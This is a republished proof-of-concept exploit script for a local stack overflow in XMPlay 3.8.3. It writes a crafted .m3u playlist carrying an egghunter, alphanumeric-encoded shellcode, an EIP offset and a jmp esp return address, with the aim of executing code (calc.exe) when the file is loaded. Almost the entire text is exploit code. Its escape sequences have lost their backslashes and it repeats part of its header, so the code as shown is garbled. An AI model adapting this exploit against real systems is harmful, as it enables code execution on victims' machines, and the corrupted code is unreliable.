XMPlay 3.8.3 Local Stack Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 271

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: XMPlay 3.8.3 - '.m3u' Code Execution (PoC)
# Date: 2018-12-19
# Exploit Author: s7acktrac3
# Ven #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: XMPlay 3.8.3 - '.m3u' Code Execution (PoC)
# Date: 2018-12-19
# Exploit Author: s7acktrac3
# Vendor Homepage: https://www.xmplay.com/
# Software Link: https://support.xmplay.com/files_view.php?file_id=676
# Version: 3.8.3 (latest)
# Tested on: Windows XP SP3
# CVE : Reserved
#
# Developer notified & delivered PoC but not interested in fixing :P
#
# Reproduction Steps:
# Lauch XMPlay & run this PoC script - it will create a file in the same directory named xmplay.m3u
# Either drag xmplay.m3u into the XMPlay window or File Menu-> select winamp.m3u. Application will "load"
# for a minute (exploit searching through memory for payload) and eventually launch calc.exe
#
# Major Shouts @Gokhan @foolsofsecurity for helping turn the DoS into Code execution & me into more of a
# beast!

from struct import pack

max_size = 728
# C:Documents and SettingsAdministratorDesktopExploit Devxmplay_383-poc.py
eip_offset = 500

file_header = "#EXTM3U "
file_header += "#EXTINF:200,Sleep Away "
file_header += "http://test."

# cat egghunter.txt | tr -d '"' | tr -d ' ' | tr -d '\x' | xxd -r -p > egghunter.bin
# msfvenom -p generic/custom PAYLOADFILE=egghunter.bin -e x86/alpha_mixed BufferRegister=EDX -a x86 --platform Windows
encoded_egg_hunter = (""
"x4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax37x52x59x6ax41x58x50x30x41x30x41x6bx41"
"x41x51x32x41x42x32x42x42x30x42x42x41x42x58x50"
"x38x41x42x75x4ax49x62x46x6fx71x4bx7ax49x6fx44"
"x4fx53x72x36x32x61x7ax46x62x66x38x78x4dx64x6e"
"x75x6cx75x55x63x6ax54x34x68x6fx6dx68x63x47x34"
"x70x54x70x72x54x4ex6bx58x7ax4ex4fx42x55x6bx5a"
"x4cx6fx31x65x78x67x59x6fx39x77x41x41")

encoded_calc = "w00tw00t" + "x57x58x04x06x50x5E" # PUSH EDI, POP EAX, ADD AL,6, PUSH EAX, POP ESI
encoded_calc += "x56x59x49x49x49x49x49x49x49x49"
encoded_calc += "x49x49x49x49x49x49x49x49x37x51"
encoded_calc += "x5ax6ax41x58x50x30x41x30x41x6b"
encoded_calc += "x41x41x51x32x41x42x32x42x42x30"
encoded_calc += "x42x42x41x42x58x50x38x41x42x75"
encoded_calc += "x4ax49x36x51x49x59x52x71x61x78"
encoded_calc += "x75x33x50x61x72x4cx31x73x73x64"
encoded_calc += "x6ex58x49x57x6ax33x39x52x64x37"
encoded_calc += "x6bx4fx38x50x41x41"

egg_addr_to_edx = ""
egg_addr_to_edx += "x54" # PUSH ESP
egg_addr_to_edx += "x58" # POP EAX
egg_addr_to_edx += "x2Dx3Cx55x55x55" # SUB EAX,5555553C
egg_addr_to_edx += "x2Dx3Cx55x55x55" # SUB EAX,5555553C
egg_addr_to_edx += "x2Dx3Cx55x55x55" # SUB EAX,5555553C
egg_addr_to_edx += "x50" # PUSH eax
egg_addr_to_edx += "x5A" # POP EDX

payload = "A" * 12
payload += encoded_calc
payload += "A" * (eip_offset - len(payload))
print "Length of payload " + str(len(payload))
payload += pack("<L", 0x78196d4d) # Jmp esp OS DLL
payload += "BBBB"
payload += egg_addr_to_edx
payload += "C" * (76 - len(egg_addr_to_edx) )
payload += encoded_egg_hunter
payload += "C" * (max_size - len(payload))
stupid_char = "|"

print "[+] Creating .m3u file with payload size: "+ str(len(payload))
exploit = file_header + payload + stupid_char
file = open('xmplay.m3u','w')
file.write(exploit)
file.close();
print "[+] Done creating the file"